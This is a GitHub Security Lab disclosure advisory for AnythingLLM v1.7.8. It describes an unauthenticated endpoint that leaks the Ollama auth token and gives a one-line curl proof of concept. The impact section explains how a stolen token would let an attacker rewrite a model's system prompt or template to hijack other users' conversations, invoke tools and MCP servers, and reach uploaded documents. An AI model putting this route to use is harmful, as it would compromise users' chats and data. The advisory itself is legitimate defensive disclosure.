Coordinated Disclosure Timeline

Summary

If AnythingLLM is configured to use Ollama with an authentication token, this token could be exposed in plain text to unauthenticated users at the /api/setup-complete endpoint.

Project

AnythingLLM

Tested Version

v1.7.8

Details

Ollama token leak in systemSettings.js (GHSL-2025-056)

AnythingLLM has an endpoint /api/setup-complete that does not require any credentials to use even if the main AnythingLLM is protected with authentication. This endpoint reveals some system information about the instance, but masks most of the sensitive values. At the same time, if AnythingLLM is set up to use Ollama with an authentication token, this token is not masked because of the error on line 475.

Proof of concept

curl localhost:3001/api/setup-complete | grep OllamaLLMAuthToken

Vulnerable code location

https://github.com/Mintplex-Labs/anything-llm/blob/051ed15f1f6b9f7f44f4663bf752a7ec3ee66f2c/server/models/systemSettings.js#L475

Impact

Ollama token leakage on AnythingLLM grants complete access to the Ollama instance. Since Ollama offers an API for configuring the models, a potential attacker could modify the model’s template or system prompt to change the model’s behavior. This would enable attackers to hijack conversations of other users, invoke any tools or MCP servers utilized by AnythingLLM, and potentially access documents uploaded to AnythingLLM by other users.

CWE

Credit

This issue was discovered and reported by GHSL team member @artsploit (Michael Stepankin).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2025-056 in any communication regarding this issue.

https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-7hpg-6pc7-cx86